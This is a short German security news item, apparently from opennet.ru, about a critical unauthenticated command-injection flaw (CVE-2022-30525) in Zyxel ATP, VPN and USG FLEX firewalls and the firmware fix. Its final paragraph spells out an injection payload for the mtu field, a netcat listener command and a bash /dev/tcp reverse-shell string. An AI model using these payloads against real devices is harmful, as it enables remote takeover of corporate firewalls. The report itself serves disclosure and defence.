In den Zyxel-GerĂ€ten der Serien ATP, VPN und USG FLEX, die fĂŒr die Einrichtung von Firewalls, IDS und VPNs in Unternehmen konzipiert sind, wurde eine kritische SicherheitsanfĂ€lligkeit (CVE-2022-30525) festgestellt. Diese ermöglicht es einem externen Angreifer, ohne Authentifizierung Code auf dem GerĂ€t mit den Rechten des Benutzers 'nobody' auszufĂŒhren. Um den Angriff durchzufĂŒhren, muss der Angreifer in der Lage sein, Anfragen ĂŒber das HTTP/HTTPS-Protokoll an das GerĂ€t zu senden. Zyxel hat die Schwachstelle mit dem Firmware-Update ZLD 5.30 behoben. Laut dem Shodan-Dienst sind derzeit in globalen Netzwerken 16.213 potenziell anfĂ€llige GerĂ€te registriert, die Anfragen ĂŒber HTTP/HTTPS akzeptieren.
Die Ausnutzung erfolgt durch das Senden speziell gestalteter Befehle an den Web-Handler /ztp/cgi-bin/handler, der ohne Authentifizierung zugĂ€nglich ist. Das Problem wird durch das Fehlen einer angemessenen Bereinigung der Anfrageparameter verursacht, wenn Befehle im System mittels des Aufrufs os.system ausgefĂŒhrt werden, der in der Bibliothek lib_wan_settings.py verwendet wird und bei der Verarbeitung der Operation setWanPortSt zum Einsatz kommt.
Zum Beispiel kann ein Angreifer im Feld mtu den Befehl â; ping 192.168.1.210;â eingeben, was zur AusfĂŒhrung des Kommandos âping 192.168.1.210â auf dem System fĂŒhrt. Um Zugriff auf die Kommandozeile zu erhalten, kann man auf dem eigenen System ânc -lvnp 1270â starten und dann eine RĂŒckverbindung (reverse shell) initiieren, indem man an das GerĂ€t eine Anfrage mit dem Parameter â; bash -c \"exec bash -i &> /dev/tcp/192.168.1.210/1270 &<1;\"â sendet.
Quelle: opennet.ru
